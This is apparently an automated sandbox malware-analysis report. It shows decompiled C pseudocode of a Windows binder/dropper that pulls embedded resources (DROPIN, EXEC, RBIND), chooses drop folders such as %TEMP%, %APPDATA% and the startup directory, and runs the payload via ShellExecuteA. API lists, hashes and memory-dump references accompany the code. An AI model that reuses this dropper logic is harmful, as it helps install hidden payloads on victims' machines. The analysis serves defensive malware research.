                                                                                                            0x00a31335
                                                                                                            0x00a31335
                                                                                                            0x00a31340
                                                                                                            0x00a3134d
                                                                                                            0x00a31352
                                                                                                            0x00a31356
                                                                                                            0x00a31356
                                                                                                            0x00a3135b
                                                                                                            0x00a3136e
                                                                                                            0x00a31374
                                                                                                            0x00a31380

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(shell32.dll,00A331F5,00A30000,00000000,00000000,0000000A), ref: 00A31325
                                                                                                            • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00A31340
                                                                                                            • EnumResourceNamesA.KERNEL32 ref: 00A3136E
                                                                                                            • FreeLibrary.KERNEL32(760B0000,?,ShellExecuteA), ref: 00A3137A
                                                                                                              • Part of subcall function 00A32E90: _doexit.LIBCMT ref: 00A32E9C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressEnumFreeLoadNamesProcResource_doexit
                                                                                                            • String ID: RBIND$ShellExecuteA$shell32.dll
                                                                                                            • API String ID: 2421111958-1274833461
                                                                                                            • Opcode ID: ffe5fed9245658f379ee5ddaca216f1ded181d6a85d52eb0190d47b6473f9a51
                                                                                                            • Instruction ID: f10f8ec221b335e8743b6d03eef3eb31a49e8fb93e193363edeb2e905d204901
                                                                                                            • Opcode Fuzzy Hash: ffe5fed9245658f379ee5ddaca216f1ded181d6a85d52eb0190d47b6473f9a51
                                                                                                            • Instruction Fuzzy Hash: 49F0ED74A84301BBD7A4EBF0AD4FB1B7AA57B12706F144801FA05E51E1D7F494428B65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A31EB0, Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 327COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 69%
                                                                                                            			E00A31EB0(intOrPtr __edx, void* __eflags) {
				char _v12;
				char _v16;
				signed int _v24;
				intOrPtr _v28;
				signed int _v36;
				char _v48;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v88;
				signed int _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t77;
				signed int _t79;
				intOrPtr* _t87;
				char _t91;
				signed int _t92;
				char _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				void* _t104;
				void* _t106;
				void* _t109;
				void* _t113;
				void* _t115;
				void* _t117;
				void* _t133;
				signed int _t135;
				void* _t136;
				signed int _t167;
				intOrPtr _t170;
				void* _t171;
				void* _t172;
				signed int _t174;
				intOrPtr _t177;
				void* _t184;
				void* _t190;
				char* _t191;
				intOrPtr* _t192;
				signed int _t193;
				intOrPtr* _t194;
				char _t195;
				void* _t198;
				signed int _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t216;
				signed int _t223;

				_t166 = __edx;
				_push(0xffffffff);
				_t207 = (_t205 & 0xfffffff8) - 0x48;
				_t77 =  *0xa3d07c; // 0xa189a5e1
				_v24 = _t77 ^ _t207;
				_t79 =  *0xa3d07c; // 0xa189a5e1
				 *[fs:0x0] =  &_v16;
				E00A31870( &_v56);
				_t208 = _t207 - 0x1c;
				_v12 = 0;
				_t191 = _t208;
				 *((intOrPtr*)(_t191 + 0x10)) = 0;
				 *((intOrPtr*)(_t191 + 0x14)) = 0xf;
				 *_t191 = 0;
				_v92 = _t208;
				E00A31420("DROPIN", 6, _t191);
				_t87 = E00A31AD0( &_v88, _t166,  &_v60, _t79 ^ _t207, _t172, _t190, _t133,  *[fs:0x0], E00A386C0); // executed
				_t192 = _t87;
				if(_t192 == 0xa3dbf8) {
					_t174 = 0;
					__eflags = 0;
				} else {
					if( *0xa3dc0c >= 0x10) {
						_t171 =  *0xa3dbf8; // 0x4d455400
						_push(_t171);
						E00A32BB1();
						_t208 = _t208 + 4;
					}
					_t174 = 0;
					 *0xa3dc0c = 0xf;
					 *0xa3dc08 = 0;
					 *0xa3dbf8 = 0;
					if( *((intOrPtr*)(_t192 + 0x14)) >= 0x10) {
						 *0xa3dbf8 =  *_t192;
						 *_t192 = 0;
					} else {
						E00A32850(0xa3dbf8, _t192,  *((intOrPtr*)(_t192 + 0x10)) + 1);
						_t208 = _t208 + 0xc;
					}
					 *0xa3dc08 =  *((intOrPtr*)(_t192 + 0x10));
					_t166 =  *((intOrPtr*)(_t192 + 0x14));
					 *0xa3dc0c =  *((intOrPtr*)(_t192 + 0x14));
					 *((intOrPtr*)(_t192 + 0x10)) = _t174;
					 *((intOrPtr*)(_t192 + 0x14)) = _t174;
				}
				_v12 = 0;
				if(_v68 >= 0x10) {
					_push(_v88);
					E00A32BB1();
					_t208 = _t208 + 4;
				}
				_t209 = _t208 - 0x1c;
				_t193 = _t209;
				 *((intOrPtr*)(_t193 + 0x10)) = _t174;
				 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
				_v92 = _t209;
				 *_t193 = 0;
				E00A31420("EXEC", 4, _t193);
				_push( &_v60);
				_t194 = E00A31AD0( &_v88, _t166);
				if(_t194 != 0xa3dc14) {
					_t216 =  *0xa3dc28 - 0x10; // 0xf
					if(_t216 >= 0) {
						_t170 =  *0xa3dc14; // 0x0
						_push(_t170);
						E00A32BB1();
						_t209 = _t209 + 4;
					}
					 *0xa3dc28 = 0xf;
					 *0xa3dc24 = 0;
					 *0xa3dc14 = 0;
					if( *((intOrPtr*)(_t194 + 0x14)) >= 0x10) {
						 *0xa3dc14 =  *_t194;
						 *_t194 = 0;
					} else {
						E00A32850(0xa3dc14, _t194,  *((intOrPtr*)(_t194 + 0x10)) + 1);
						_t209 = _t209 + 0xc;
					}
					 *0xa3dc24 =  *((intOrPtr*)(_t194 + 0x10));
					 *0xa3dc28 =  *((intOrPtr*)(_t194 + 0x14));
					 *((intOrPtr*)(_t194 + 0x10)) = 0;
					 *((intOrPtr*)(_t194 + 0x14)) = 0;
				}
				_v16 = 0;
				if(_v72 >= 0x10) {
					_push(_v92);
					E00A32BB1();
					_t209 = _t209 + 4;
				}
				_t195 =  *0xa3dc08; // 0x0
				_t91 = _t195;
				if(_t195 >= 6) {
					_t91 = 6;
				}
				_t177 =  *0xa3dc0c; // 0xf
				_t135 =  *0xa3dbf8; // 0x4d455400
				_t167 = _t135;
				if(_t177 < 0x10) {
					_t167 = 0xa3dbf8;
				}
				_t92 = E00A31040(_t91, "%TEMP%", _t167);
				if(_t92 == 0) {
					if(_t195 >= 6) {
						__eflags = _t195 - 6;
						_t35 = _t195 != 6;
						__eflags = _t35;
						_t92 = 0 | _t35;
					} else {
						_t92 = _t92 | 0xffffffff;
					}
					_t223 = _t92;
				}
				if((_t92 & 0xffffff00 | _t223 == 0x00000000) == 0) {
					_t94 = _t195;
					__eflags = _t195 - 9;
					if(_t195 >= 9) {
						_t94 = 9;
					}
					_t168 = _t135;
					__eflags = _t177 - 0x10;
					if(_t177 < 0x10) {
						_t168 = 0xa3dbf8;
					}
					_t95 = E00A31040(_t94, "%APPDATA%", _t168);
					__eflags = _t95;
					if(__eflags == 0) {
						__eflags = _t195 - 9;
						if(_t195 >= 9) {
							__eflags = _t195 - 9;
							_t43 = _t195 != 9;
							__eflags = _t43;
							_t95 = 0 | _t43;
						} else {
							_t95 = _t95 | 0xffffffff;
						}
						__eflags = _t95;
					}
					if(__eflags == 0) {
						_t97 = E00A325D0("%PROGFILES%", 0xa3dbf8);
						__eflags = _t97;
						if(_t97 == 0) {
							_t98 = E00A325D0("%DEFDRIVE%", 0xa3dbf8);
							__eflags = _t98;
							if(_t98 == 0) {
								_t99 = E00A325D0("%STARTUPDIR%", 0xa3dbf8);
								__eflags = _t99;
								if(_t99 == 0) {
									_t100 = E00A325D0("%LAPPDATA%", 0xa3dbf8);
									__eflags = _t100;
									if(_t100 == 0) {
										_t101 = E00A325D0("%USERDIR%", 0xa3dbf8);
										__eflags = _t101;
										if(_t101 == 0) {
											_t209 = _t209 - 0x1c;
											_v96 = _t209;
											E00A31390("FULLPATH", _t209);
											_t168 =  &_v64;
											_push( &_v64);
											_t104 = E00A31AD0( &_v92,  &_v64);
											_v48 = 0xb;
										} else {
											_t104 = E00A31C50( &_v92, 5);
											_t209 = _t209 + 4;
											_v16 = 0xa;
										}
									} else {
										_t104 = E00A31C50( &_v92, 0x1c);
										_t209 = _t209 + 4;
										_v16 = 9;
									}
								} else {
									_t104 = E00A31C50( &_v92, 0x18);
									_t209 = _t209 + 4;
									_v16 = 8;
								}
								L59:
								E00A323D0(_t104, 0xa3dc30);
								_t106 = E00A32340( &_v96);
								goto L60;
							}
							_t159 =  &_v92;
							_t109 = E00A31DA0(_t135,  &_v92);
							_v16 = 6;
							E00A323D0(_t109, 0xa3dc30);
							_v16 = 0;
							__eflags = _v72 - 0x10;
							if(_v72 >= 0x10) {
								_t159 = _v92;
								_push(_v92);
								E00A32BB1();
								_t209 = _t209 + 4;
							}
							__eflags =  *0xa3dc40;
							if( *0xa3dc40 <= 0) {
								_t106 = E00A31420("C:\\", 3, 0xa3dc30);
								goto L60;
							} else {
								_t104 = E00A32440(_t159,  &_v92, 0xa3dc30, 3);
								_v24 = 7;
								goto L59;
							}
						}
						_t113 = E00A31C50( &_v92, 0x26);
						_t209 = _t209 + 4;
						_v16 = 5;
						_t106 = E00A323D0(_t113, 0xa3dc30);
						__eflags = _v72 - 0x10;
						if(_v72 >= 0x10) {
							_push(_v92);
							_t106 = E00A32BB1();
							_t209 = _t209 + 4;
						}
					} else {
						_t115 = E00A31C50( &_v92, 0x1a);
						_t209 = _t209 + 4;
						_v16 = 4;
						_t106 = E00A323D0(_t115, 0xa3dc30);
						__eflags = _v72 - 0x10;
						if(_v72 >= 0x10) {
							_t168 = _v92;
							_push(_v92);
							_t106 = E00A32BB1();
							_t209 = _t209 + 4;
						}
					}
					goto L60;
				} else {
					_t117 = E00A31E20(_t135,  &_v92);
					_v16 = 3;
					_t106 = E00A323D0(_t117, 0xa3dc30);
					if(_v72 >= 0x10) {
						_push(_v92);
						_t106 = E00A32BB1();
						_t209 = _t209 + 4;
					}
					L60:
					if(_v48 >= 0x10) {
						_push(_v68);
						_t106 = E00A32BB1();
						_t209 = _t209 + 4;
					}
					 *[fs:0x0] = _v28;
					_pop(_t184);
					_pop(_t198);
					_pop(_t136);
					return E00A32701(_t106, _t136, _v36 ^ _t209, _t168, _t184, _t198);
				}
			}





























































                                                                                                            0x00a31eb0
                                                                                                            0x00a31eb6
                                                                                                            0x00a31ec4
                                                                                                            0x00a31ec7
                                                                                                            0x00a31ece
                                                                                                            0x00a31ed5
                                                                                                            0x00a31ee1
                                                                                                            0x00a31eec
                                                                                                            0x00a31ef3
                                                                                                            0x00a31ef6
                                                                                                            0x00a31efa
                                                                                                            0x00a31f01
                                                                                                            0x00a31f04
                                                                                                            0x00a31f07
                                                                                                            0x00a31f11
                                                                                                            0x00a31f15
                                                                                                            0x00a31f23
                                                                                                            0x00a31f28
                                                                                                            0x00a31f30
                                                                                                            0x00a31f9d
                                                                                                            0x00a31f9d
                                                                                                            0x00a31f32
                                                                                                            0x00a31f39
                                                                                                            0x00a31f3b
                                                                                                            0x00a31f41
                                                                                                            0x00a31f42
                                                                                                            0x00a31f47
                                                                                                            0x00a31f47
                                                                                                            0x00a31f4a
                                                                                                            0x00a31f4c
                                                                                                            0x00a31f52
                                                                                                            0x00a31f58
                                                                                                            0x00a31f63
                                                                                                            0x00a31f7c
                                                                                                            0x00a31f81
                                                                                                            0x00a31f65
                                                                                                            0x00a31f70
                                                                                                            0x00a31f75
                                                                                                            0x00a31f75
                                                                                                            0x00a31f86
                                                                                                            0x00a31f8c
                                                                                                            0x00a31f8f
                                                                                                            0x00a31f95
                                                                                                            0x00a31f98
                                                                                                            0x00a31f98
                                                                                                            0x00a31f9f
                                                                                                            0x00a31fa9
                                                                                                            0x00a31faf
                                                                                                            0x00a31fb0
                                                                                                            0x00a31fb5
                                                                                                            0x00a31fb5
                                                                                                            0x00a31fb8
                                                                                                            0x00a31fbb
                                                                                                            0x00a31fbd
                                                                                                            0x00a31fc0
                                                                                                            0x00a31fcd
                                                                                                            0x00a31fd1
                                                                                                            0x00a31fd4
                                                                                                            0x00a31fdd
                                                                                                            0x00a31fe7
                                                                                                            0x00a31ff4
                                                                                                            0x00a31ff6
                                                                                                            0x00a31ffc
                                                                                                            0x00a31ffe
                                                                                                            0x00a32004
                                                                                                            0x00a32005
                                                                                                            0x00a3200a
                                                                                                            0x00a3200a
                                                                                                            0x00a3200d
                                                                                                            0x00a32015
                                                                                                            0x00a3201b
                                                                                                            0x00a32024
                                                                                                            0x00a3203d
                                                                                                            0x00a32042
                                                                                                            0x00a32026
                                                                                                            0x00a32031
                                                                                                            0x00a32036
                                                                                                            0x00a32036
                                                                                                            0x00a32047
                                                                                                            0x00a32050
                                                                                                            0x00a32056
                                                                                                            0x00a32059
                                                                                                            0x00a32059
                                                                                                            0x00a3205c
                                                                                                            0x00a32065
                                                                                                            0x00a3206b
                                                                                                            0x00a3206c
                                                                                                            0x00a32071
                                                                                                            0x00a32071
                                                                                                            0x00a32074
                                                                                                            0x00a3207a
                                                                                                            0x00a3207f
                                                                                                            0x00a32081
                                                                                                            0x00a32081
                                                                                                            0x00a32086
                                                                                                            0x00a3208c
                                                                                                            0x00a32092
                                                                                                            0x00a32097
                                                                                                            0x00a32099
                                                                                                            0x00a32099
                                                                                                            0x00a320a3
                                                                                                            0x00a320aa
                                                                                                            0x00a320af
                                                                                                            0x00a320b8
                                                                                                            0x00a320bb
                                                                                                            0x00a320bb
                                                                                                            0x00a320bb
                                                                                                            0x00a320b1
                                                                                                            0x00a320b1
                                                                                                            0x00a320b1
                                                                                                            0x00a320be
                                                                                                            0x00a320be
                                                                                                            0x00a320c5
                                                                                                            0x00a320fe
                                                                                                            0x00a32100
                                                                                                            0x00a32103
                                                                                                            0x00a32105
                                                                                                            0x00a32105
                                                                                                            0x00a3210a
                                                                                                            0x00a3210c
                                                                                                            0x00a3210f
                                                                                                            0x00a32111
                                                                                                            0x00a32111
                                                                                                            0x00a3211b
                                                                                                            0x00a32120
                                                                                                            0x00a32122
                                                                                                            0x00a32124
                                                                                                            0x00a32127
                                                                                                            0x00a32130
                                                                                                            0x00a32133
                                                                                                            0x00a32133
                                                                                                            0x00a32133
                                                                                                            0x00a32129
                                                                                                            0x00a32129
                                                                                                            0x00a32129
                                                                                                            0x00a32136
                                                                                                            0x00a32136
                                                                                                            0x00a3213d
                                                                                                            0x00a32185
                                                                                                            0x00a3218a
                                                                                                            0x00a3218c
                                                                                                            0x00a321d4
                                                                                                            0x00a321d9
                                                                                                            0x00a321db
                                                                                                            0x00a32258
                                                                                                            0x00a3225d
                                                                                                            0x00a3225f
                                                                                                            0x00a32280
                                                                                                            0x00a32285
                                                                                                            0x00a32287
                                                                                                            0x00a322a8
                                                                                                            0x00a322ad
                                                                                                            0x00a322af
                                                                                                            0x00a322c6
                                                                                                            0x00a322d0
                                                                                                            0x00a322d4
                                                                                                            0x00a322d9
                                                                                                            0x00a322dd
                                                                                                            0x00a322e2
                                                                                                            0x00a322e7
                                                                                                            0x00a322b1
                                                                                                            0x00a322b7
                                                                                                            0x00a322bc
                                                                                                            0x00a322bf
                                                                                                            0x00a322bf
                                                                                                            0x00a32289
                                                                                                            0x00a3228f
                                                                                                            0x00a32294
                                                                                                            0x00a32297
                                                                                                            0x00a32297
                                                                                                            0x00a32261
                                                                                                            0x00a32267
                                                                                                            0x00a3226c
                                                                                                            0x00a3226f
                                                                                                            0x00a3226f
                                                                                                            0x00a322ec
                                                                                                            0x00a322f3
                                                                                                            0x00a322fc
                                                                                                            0x00000000
                                                                                                            0x00a322fc
                                                                                                            0x00a321dd
                                                                                                            0x00a321e1
                                                                                                            0x00a321ed
                                                                                                            0x00a321f2
                                                                                                            0x00a321f7
                                                                                                            0x00a321fc
                                                                                                            0x00a32201
                                                                                                            0x00a32203
                                                                                                            0x00a32207
                                                                                                            0x00a32208
                                                                                                            0x00a3220d
                                                                                                            0x00a3220d
                                                                                                            0x00a32210
                                                                                                            0x00a32217
                                                                                                            0x00a32244
                                                                                                            0x00000000
                                                                                                            0x00a32219
                                                                                                            0x00a32226
                                                                                                            0x00a3222b
                                                                                                            0x00000000
                                                                                                            0x00a3222b
                                                                                                            0x00a32217
                                                                                                            0x00a32194
                                                                                                            0x00a32199
                                                                                                            0x00a321a3
                                                                                                            0x00a321a8
                                                                                                            0x00a321ad
                                                                                                            0x00a321b2
                                                                                                            0x00a321bc
                                                                                                            0x00a321bd
                                                                                                            0x00a321c2
                                                                                                            0x00a321c2
                                                                                                            0x00a3213f
                                                                                                            0x00a32145
                                                                                                            0x00a3214a
                                                                                                            0x00a32154
                                                                                                            0x00a32159
                                                                                                            0x00a3215e
                                                                                                            0x00a32163
                                                                                                            0x00a32169
                                                                                                            0x00a3216d
                                                                                                            0x00a3216e
                                                                                                            0x00a32173
                                                                                                            0x00a32173
                                                                                                            0x00a32163
                                                                                                            0x00000000
                                                                                                            0x00a320c7
                                                                                                            0x00a320cb
                                                                                                            0x00a320d7
                                                                                                            0x00a320dc
                                                                                                            0x00a320e6
                                                                                                            0x00a320f0
                                                                                                            0x00a320f1
                                                                                                            0x00a320f6
                                                                                                            0x00a320f6
                                                                                                            0x00a32301
                                                                                                            0x00a32306
                                                                                                            0x00a3230c
                                                                                                            0x00a3230d
                                                                                                            0x00a32312
                                                                                                            0x00a32312
                                                                                                            0x00a32319
                                                                                                            0x00a32321
                                                                                                            0x00a32322
                                                                                                            0x00a32323
                                                                                                            0x00a32332
                                                                                                            0x00a32332

                                                                                                            APIs
                                                                                                              • Part of subcall function 00A31AD0: FindResourceA.KERNEL32(00000000,?,?), ref: 00A31B20
                                                                                                            • _memmove.LIBCMT ref: 00A31F70
                                                                                                              • Part of subcall function 00A31C50: SHGetSpecialFolderPathA.SHELL32(00000000,?,?,00000000,A189A5E1), ref: 00A31C9E
                                                                                                              • Part of subcall function 00A323D0: _memmove.LIBCMT ref: 00A32403
                                                                                                            • _memmove.LIBCMT ref: 00A32031
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _memmove$FindFolderPathResourceSpecial
                                                                                                            • String ID: %APPDATA%$%DEFDRIVE%$%LAPPDATA%$%PROGFILES%$%STARTUPDIR%$%TEMP%$%USERDIR%$C:\$DROPIN$EXEC$FULLPATH
                                                                                                            • API String ID: 1519558674-3215377631
                                                                                                            • Opcode ID: 69752cdfe17de193bb08837bf0ecbde7f42adf61924210fbe9cbb652b7ad78aa
                                                                                                            • Instruction ID: 93f91d06fc00da3b8e6ce08451fd871bb80e946c1d9ffdf3b1e5537a0beb5631
                                                                                                            • Opcode Fuzzy Hash: 69752cdfe17de193bb08837bf0ecbde7f42adf61924210fbe9cbb652b7ad78aa
                                                                                                            • Instruction Fuzzy Hash: 13C1FFB1918340CBD714EF79AA4275BF7E5AB85300F040A2DF9968B391EB74D849C7A3
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A31AD0, Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 72%
                                                                                                            			E00A31AD0(void** __ecx, CHAR* __edx, intOrPtr _a4, CHAR* _a8, intOrPtr _a28) {
				struct HINSTANCE__* _v8;
				char _v16;
				signed int _v20;
				char _v279;
				char _v280;
				void* _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t34;
				intOrPtr _t36;
				struct HRSRC__* _t38;
				void* _t39;
				long _t40;
				intOrPtr* _t46;
				struct HRSRC__* _t59;
				void* _t61;
				CHAR* _t63;
				intOrPtr _t65;
				void* _t75;
				void* _t77;
				void** _t80;
				void* _t81;
				signed int _t82;
				void* _t83;
				void* _t84;

				_t71 = __edx;
				_push(0xffffffff);
				_push(E00A38598);
				_push( *[fs:0x0]);
				_t84 = _t83 - 0x10c;
				_t33 =  *0xa3d07c; // 0xa189a5e1
				_t34 = _t33 ^ _t82;
				_v20 = _t34;
				_push(_t34);
				 *[fs:0x0] =  &_v16;
				_t36 = _a4;
				_t80 = __ecx;
				_v284 = 0;
				_v8 = 0;
				_t63 = _a8;
				if(_a28 < 0x10) {
					_t63 =  &_a8;
				}
				_t38 = FindResourceA(0, _t63,  *(_t36 + 0x1c)); // executed
				_t59 = _t38;
				if(_t59 != 0) {
					_t39 = LoadResource(0, _t59);
					_t75 = _t39;
					if(_t75 != 0) {
						_t40 = SizeofResource(0, _t59);
						_v284 = LockResource(_t75);
						_v280 = 0;
						E00A357C0( &_v279, 0, 0x103);
						E00A32850( &_v280, _v284, _t40);
						_t84 = _t84 + 0x18;
						FreeResource(_t75);
						_t46 =  &_v280;
						_t80[5] = 0xf;
						_t80[4] = 0;
						 *_t80 = 0;
						_t26 = _t46 + 1; // 0x1
						_t71 = _t26;
						do {
							_t65 =  *_t46;
							_t46 = _t46 + 1;
						} while (_t65 != 0);
						E00A31420( &_v280, _t46 - _t71, _t80);
						if(_a28 >= 0x10) {
							_push(_a8);
							goto L12;
						}
					} else {
						_t80[4] = _t39;
						_t80[5] = 0xf;
						 *_t80 = _t39;
						E00A31420(0xa3b0aa, _t75, _t80);
						if(_a28 >= 0x10) {
							_t71 = _a8;
							_push(_a8);
							goto L12;
						}
					}
				} else {
					_t80[4] = 0;
					_t80[5] = 0xf;
					 *_t80 = 0;
					E00A31420(0xa3b0aa, 0, _t80);
					if(_a28 >= 0x10) {
						_push(_a8);
						L12:
						E00A32BB1();
					}
				}
				 *[fs:0x0] = _v16;
				_pop(_t77);
				_pop(_t81);
				_pop(_t61);
				return E00A32701(_t80, _t61, _v20 ^ _t82, _t71, _t77, _t81);
			}






























                                                                                                            0x00a31ad0
                                                                                                            0x00a31ad3
                                                                                                            0x00a31ad5
                                                                                                            0x00a31ae0
                                                                                                            0x00a31ae1
                                                                                                            0x00a31ae7
                                                                                                            0x00a31aec
                                                                                                            0x00a31aee
                                                                                                            0x00a31af4
                                                                                                            0x00a31af8
                                                                                                            0x00a31afe
                                                                                                            0x00a31b03
                                                                                                            0x00a31b05
                                                                                                            0x00a31b0b
                                                                                                            0x00a31b12
                                                                                                            0x00a31b15
                                                                                                            0x00a31b17
                                                                                                            0x00a31b17
                                                                                                            0x00a31b20
                                                                                                            0x00a31b26
                                                                                                            0x00a31b2a
                                                                                                            0x00a31b5a
                                                                                                            0x00a31b60
                                                                                                            0x00a31b64
                                                                                                            0x00a31b92
                                                                                                            0x00a31ba6
                                                                                                            0x00a31bb5
                                                                                                            0x00a31bbc
                                                                                                            0x00a31bd0
                                                                                                            0x00a31bd5
                                                                                                            0x00a31bd9
                                                                                                            0x00a31bdf
                                                                                                            0x00a31be5
                                                                                                            0x00a31bec
                                                                                                            0x00a31bf3
                                                                                                            0x00a31bf6
                                                                                                            0x00a31bf6
                                                                                                            0x00a31c00
                                                                                                            0x00a31c00
                                                                                                            0x00a31c02
                                                                                                            0x00a31c03
                                                                                                            0x00a31c11
                                                                                                            0x00a31c1a
                                                                                                            0x00a31c1f
                                                                                                            0x00000000
                                                                                                            0x00a31c1f
                                                                                                            0x00a31b66
                                                                                                            0x00a31b66
                                                                                                            0x00a31b69
                                                                                                            0x00a31b70
                                                                                                            0x00a31b77
                                                                                                            0x00a31b80
                                                                                                            0x00a31b86
                                                                                                            0x00a31b89
                                                                                                            0x00000000
                                                                                                            0x00a31b89
                                                                                                            0x00a31b80
                                                                                                            0x00a31b2c
                                                                                                            0x00a31b2c
                                                                                                            0x00a31b2f
                                                                                                            0x00a31b3d
                                                                                                            0x00a31b40
                                                                                                            0x00a31b49
                                                                                                            0x00a31b52
                                                                                                            0x00a31c20
                                                                                                            0x00a31c20
                                                                                                            0x00a31c25
                                                                                                            0x00a31b49
                                                                                                            0x00a31c2d
                                                                                                            0x00a31c35
                                                                                                            0x00a31c36
                                                                                                            0x00a31c37
                                                                                                            0x00a31c45

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(00000000,?,?), ref: 00A31B20
                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A31B5A
                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 00A31B92
                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A31B9B
                                                                                                            • _memset.LIBCMT ref: 00A31BBC
                                                                                                            • _memmove.LIBCMT ref: 00A31BD0
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 00A31BD9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLockSizeof_memmove_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 4079094743-0
                                                                                                            • Opcode ID: e60acfb88607a81f65f76a9d0b65066b97bec367ebbf6ca38e50cc408457ca90
                                                                                                            • Instruction ID: 3152feae474860143aa609b02e95814e153cdd690ef1657421f88cc530c7c4b8
                                                                                                            • Opcode Fuzzy Hash: e60acfb88607a81f65f76a9d0b65066b97bec367ebbf6ca38e50cc408457ca90
                                                                                                            • Instruction Fuzzy Hash: F541E171900208DFDB24DF68DC45BEAB7F8FB49700F004A5AF95697241DBB49A45CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00A31330, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00A31330(struct HINSTANCE__* __eax, intOrPtr __edx) {
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr _t8;

				_t8 = __edx;
				_t1 = __eax;
				if(__eax == 0) {
					_t1 = E00A32E90(__eax);
				}
				_t2 = GetProcAddress(_t1, "ShellExecuteA");
				 *0xa3e944 = _t2;
				if(__imp__ShellExecuteA == 0) {
					E00A32E90(0); // executed
				}
				E00A31EB0(_t8, __imp__ShellExecuteA); // executed
				EnumResourceNamesA(0, "RBIND", E00A310C0, 0);
				_t5 =  *0xa3e940; // 0x760b0000
				return FreeLibrary(_t5);
			}






                                                                                                            0x00a31330
                                                                                                            0x00a31330
                                                                                                            0x00a31332
                                                                                                            0x00a31335
                                                                                                            0x00a31335
                                                                                                            0x00a31340
                                                                                                            0x00a3134d
                                                                                                            0x00a31352
                                                                                                            0x00a31356
                                                                                                            0x00a31356
                                                                                                            0x00a3135b
                                                                                                            0x00a3136e
                                                                                                            0x00a31374
                                                                                                            0x00a31380

                                                                                                            APIs
                                                                                                            • GetProcAddress.KERNEL32(?,ShellExecuteA), ref: 00A31340
                                                                                                            • EnumResourceNamesA.KERNEL32 ref: 00A3136E
                                                                                                            • FreeLibrary.KERNEL32(760B0000,?,ShellExecuteA), ref: 00A3137A
                                                                                                              • Part of subcall function 00A32E90: _doexit.LIBCMT ref: 00A32E9C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.199966421.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.199961685.0000000000A30000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199974203.0000000000A39000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.199979711.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000001.00000002.200014509.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressEnumFreeLibraryNamesProcResource_doexit
                                                                                                            • String ID: RBIND$ShellExecuteA
                                                                                                            • API String ID: 2589694317-233069040
                                                                                                            • Opcode ID: d85750ed479726b7a39cae42efeb20851a1164c83c5ef5fb5cd45d5821ec31b5
                                                                                                            • Instruction ID: 004dac64b05d8df6a627ab7b828a9dc093f96ff43a37998454b37813e2a09ced
                                                                                                            • Opcode Fuzzy Hash: d85750ed479726b7a39cae42efeb20851a1164c83c5ef5fb5cd45d5821ec31b5
